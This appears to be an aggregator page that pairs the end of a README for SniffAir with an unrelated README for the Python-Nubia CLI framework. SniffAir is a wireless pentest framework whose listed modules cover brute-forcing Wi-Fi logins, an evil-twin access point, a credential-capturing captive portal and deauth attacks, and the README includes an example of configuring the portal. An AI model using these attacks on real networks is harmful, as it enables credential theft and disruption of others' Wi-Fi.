[+] Importing /root/sniffair/demo.pcapdump
[+] Completed
[+] Cleaning Up Duplicates
[+] ESSIDs Observed

Show Command

The show command displays the contents of a table, specific information across all tables or the available modules, using the following syntax:

>> [demo]# show table AP
+------+-----------+-------------------+-------------------------------+------+-----+------+--------+------+
| ID   | ESSID     | BSSID             | VENDOR                        | CHAN | PWR | ENC  | CIPHER | AUTH |
|------+-----------+-------------------+-------------------------------+------+-----+------+--------+------|
| 1    | HoneyPot  | c4:6e:1f:##:##:## | TP-LINK TECHNOLOGIES CO. LTD. | 4    | -17 | WPA2 | TKIP   | MGT  |
| 2    | Demo      | 80:2a:a8:##:##:## | Ubiquiti Networks Inc.        | 11   | -19 | WPA2 | CCMP   | PSK  |
| 3    | Demo5ghz  | 82:2a:a8:##:##:## | Unknown                       | 36   | -27 | WPA2 | CCMP   | PSK  |
| 4    | HoneyPot1 | c4:6e:1f:##:##:## | TP-LINK TECHNOLOGIES CO. LTD. | 36   | -29 | WPA2 | TKIP   | PSK  |
| 5    | BELL456   | 44:e9:dd:##:##:## | Sagemcom Broadband SAS        | 6    | -73 | WPA2 | CCMP   | PSK  |
+------+-----------+-------------------+-------------------------------+------+-----+------+--------+------+

>> [demo]# show SSIDS
---------
HoneyPot
Demo
HoneyPot1
BELL456
Hidden
Demo5ghz
---------

The query command can be used to display a unique set of data based on the parameters specified. The query command uses SQL syntax.

Inscope

The inscope <SSID> command can be used to add an SSID to the inscope tables, loading all related data to the inscope_AP, inscope_proberequests and inscope_proberesponses tables. To view a summary of all inscope SSIDS run the SSID_Info command.

Modules

Modules can be used to analyze the data contained in the workspaces or perform offensive wireless attacks using the use <module name> command. For some modules additional variables may need to be set. They can be set using the set command: set <variable name> <variable value>:

>> [demo]# show modules
Available Modules
=================
[+] Auto EAP - Automated Brute-Force Login Attack Against EAP Networks
[+] Auto PSK - Automated Brute-Force Passphrase Attack Against PSK Networks
[+] AP Hunter - Discover Access Point Within a Certain Range Using a Specific Type of Encrpytion
[+] Captive Portal - Web Based Login Portal to Capture User Entered Credentials (Runs as an OPEN Network)
[+] Certificate Generator - Generates a Certificate Used by Evil Twin Attacks
[+] Exporter - Exports Data Stored in a Workspace to a CSV File
[+] Evil Twin - Creates a Fake Access Point, Clients Connect to Divulging MSCHAP Hashes or Cleartext Passwords
[+] Handshaker - Parses Database or .pcapdump Files Extracting the Pre-Shared Handshake for Password Guessing (Hashcat or JTR Format)
[+] Mac Changer - Changes The Mac Address of an Interface
[+] Probe Packet - Sends Out Deauth Packets Targeting SSID(s)
[+] Proof Packet - Parses Database or .pcapdump Files Extracting all Packets Related to the Inscope SSDIS
[+] Hidden SSID - Discovers the Names of HIDDEN SSIDS
[+] Suspicious AP - Looks for Access Points that: Is On Different Channel, use a Different Vendor or Encrpytion Type Then the Rest of The Network
[+] Wigle Search SSID - Queries wigle for SSID (i.e. Bob's wifi)
[+] Wigle Search MAC - Queries wigle for all observations of a single mac address
>> [demo]#

>> [demo]# use Captive Portal
>> [demo][Captive Portal]# info
Globally Set Varibles
=====================
Module: Captive Portal
Interface:
SSID:
Channel:
Template: Cisco (More to be added soon)
>> [demo][Captive Portal]# set Interface wlan0
>> [demo][Captive Portal]# set SSID demo
>> [demo][Captive Portal]# set Channel 1
>> [demo][Captive Portal]# info
Globally Set Varibles
=====================
Module: Captive Portal
Interface: wlan0
SSID: demo
Channel: 1
Template: Cisco (More to be added soon)
>> [demo][Captive Portal]#

Once all variables are set, execute the exploit or run command to run the desired attack.

Export

To export all information stored in a workspace's tables, use the Exporter module and set the desired path.

Acknowledgments

SniffAir contains work from the following repositories:
- hostapd-wpe
- jmalinen/hostap
- lootbooty

Download SniffAir

Link: http://feedproxy.google.com/~r/PentestTools/~3/MbOna5CFG4s/sniffair-framework-for-wireless.html

Python-Nubia – A Command-Line And Interactive Shell Framework

Nubia is a lightweight framework for building command-line applications with Python. It was originally designed for the "logdevice interactive shell (aka. ldshell)" at Facebook. Since then it was factored out to be a reusable component and several internal Facebook projects now rely on it as a quick and easy way to get an intuitive shell/cli application without too much boilerplate.

Nubia is built on top of python-prompt-toolkit which is a fantastic toolkit for building interactive command-line applications.

Disclaimer: Nubia is beta for non-ldshell use-cases. Some of the design decisions might sound odd but they fit the ldshell usecase perfectly. We are continuously making changes to make it more consistent and generic outside of the ldshell use-case. Until a fully stable release is published, use it at your own risk.

See the CONTRIBUTING file for how to help out.

If you are curious about the origins of the name, check out Nubia on Wikipedia with its unique and colourful architecture.

Key Features
- Interactive mode that offers fish-style auto-completion
- CLI mode that gets generated from your functions and classes.
- Optional bash/zsh completions via an external utility 'nubia-complete' (experimental)
- A customisable status-bar in interactive mode.
- An optional IPython-based interactive shell
- Arguments with underscores are automatically hyphenated
- Python3 type annotations are used for input type validation

Interactive mode

The interactive mode in Nubia is what makes it unique. It is very easy to build a unique shell for your program with zero overhead. The interactive shell in its simplest form offers automatic completions for commands, sub-commands, arguments, and values. It also offers a great deal of control for developers to take control over auto-completions, even for commands that do not fall under the typical format. An example is the "select" command in ldshell which is expressed as a SQL-query. We expect that most use cases of Nubia will not need such control and the AutoCommand will be enough without further customisation.

If you start a nubia-based program without a command, it automatically starts an interactive shell. The interactive mode looks like this:

[screenshot of the interactive mode]

Non-interactive mode

The CLI mode works exactly like any traditional unix-based command line utility.

Examples

It starts with a function like this:

import socket
import typing

from termcolor import cprint
from nubia import argument, command, context


@command
@argument("hosts", description="Hostnames to resolve", aliases=["i"])
@argument("bad_name", name="nice", description="testing")
def lookup(hosts: typing.List[str], bad_name: int):
    """
    This will lookup the hostnames and print the corresponding IP addresses
    """
    ctx = context.get_context()
    print(f"hosts: {hosts}")
    cprint(f"Verbose? {ctx.verbose}")

    for host in hosts:
        cprint(f"{host} is {socket.gethostbyname(host)}")

    # optional, by default it's 0
    return 0

Requirements

Nubia-based applications require python 3.6+ and work with both Mac OS X and Linux. While in theory it should work on Windows, it has never been tried.

Installing Nubia

If you are installing nubia for your next project, you should be able to easily use pip for that:

pip3 install python-nubia

Building Nubia from source

Ensure pipenv is installed:

pip3 install pipenv

You can either use setup.py to build a tarball, or use pipenv to set up a virtualenv with all the dependencies installed.

Running the example in a virtualenv:

If you would like to run the example, then you need to add the root of the source tree into your PYTHONPATH.

pipenv update --dev
pipenv shell
export PYTHONPATH="$(pwd)"
cd example/
python nubia_example.py

To run the unit tests:

pipenv run nosetests

Getting Started

See the getting started guide to learn how to build a simple application with Nubia.

Download Python-Nubia

Link: http://feedproxy.google.com/~r/PentestTools/~3/-w_cjQ_08MQ/python-nubia-command-line-and.html